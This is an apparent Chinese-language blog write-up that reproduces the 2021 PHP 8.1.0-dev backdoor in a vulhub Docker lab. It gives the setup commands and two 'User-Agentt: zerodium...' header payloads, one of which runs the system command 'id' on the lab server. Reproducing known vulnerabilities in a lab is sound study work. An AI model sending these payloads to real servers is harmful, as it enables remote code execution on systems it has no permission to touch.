php-8.1.0开发版本后门漏洞

环境搭建 漏洞复现 网络安全 vulhub PHP
漏洞复现
发布日期:   2022-05-05
文章字数:   174
阅读次数:  

PHP 8.1.0-dev开发版本后门事件

漏洞简述

PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。

环境搭建

cd /vulhub/php/8.1-backdoor
docker-compose up -d

复现测试

先打开burpsuite,抓取http://192.168.3.151:8080数据包

构造payload

User-Agentt: zerodiumvar_dump(233*233);

image-20220505161158695

执行一下系统命令

User-Agentt: zerodiumsystem('id');

image-20220505161250514

ok结束!

文章作者: Broken-year
文章链接: http://Broken-year.github.io/2022/05/05/php-backdoor/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Broken-year !
环境搭建 漏洞复现 网络安全 vulhub PHP
  目录